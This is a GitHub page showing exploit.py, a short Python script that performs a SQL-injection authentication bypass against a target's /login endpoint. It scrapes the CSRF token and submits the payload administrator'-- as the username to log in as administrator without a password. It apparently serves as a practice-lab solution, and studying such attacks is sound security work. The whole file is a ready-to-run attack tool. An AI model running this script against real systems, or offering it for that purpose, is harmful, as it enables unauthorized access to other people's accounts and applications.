-
Notifications
You must be signed in to change notification settings - Fork 0
/
exploit.py
66 lines (53 loc) · 1.85 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
import requests
import argparse
from urllib.parse import urlparse
from bs4 import BeautifulSoup
parser = argparse.ArgumentParser()
parser.add_argument("url", help="the target's URL (e: https://example.com)")
args = parser.parse_args()
input_url = args.url
endpoint = "/login"
payload = "administrator'--"
def get_endpoint(url, endpoint):
url_parsed = urlparse(url)
url_endpoint = f"{url_parsed.scheme}://{url_parsed.netloc}{endpoint}"
return url_endpoint
def exploit(url, endpoint, payload):
endpoint = get_endpoint(url, endpoint)
session = requests.Session()
try:
initial_response = session.get(endpoint)
initial_response.raise_for_status()
soup = BeautifulSoup(initial_response.text, 'html.parser')
form = soup.find('input')
csrf_token = form.get('value')
exploit = {
'csrf': csrf_token,
'username': payload,
'password': "anything"
}
response = session.request("POST", endpoint, data=exploit)
response.raise_for_status()
return response.status_code
except requests.exceptions.ConnectionError:
print(f"Connection error occurred\nCheck again if the host is up!!!")
return (None, None)
except requests.exceptions.HTTPError as http_err:
print(f'The host responses with: "{
http_err}"\nCheck again if the host is up!!!')
return (None, None)
def main():
print("Exploiting target...")
print("-"*50)
response = exploit(input_url, endpoint, payload)
if response == 200:
print(f"Endpoint: {get_endpoint(
input_url, endpoint)} (Username Input)")
print(f"Payload: {payload}")
print("-"*50)
print("Exploiting success!!!")
else:
print("-"*50)
print("Fail to exploit the target!!!")
if __name__ == "__main__":
main()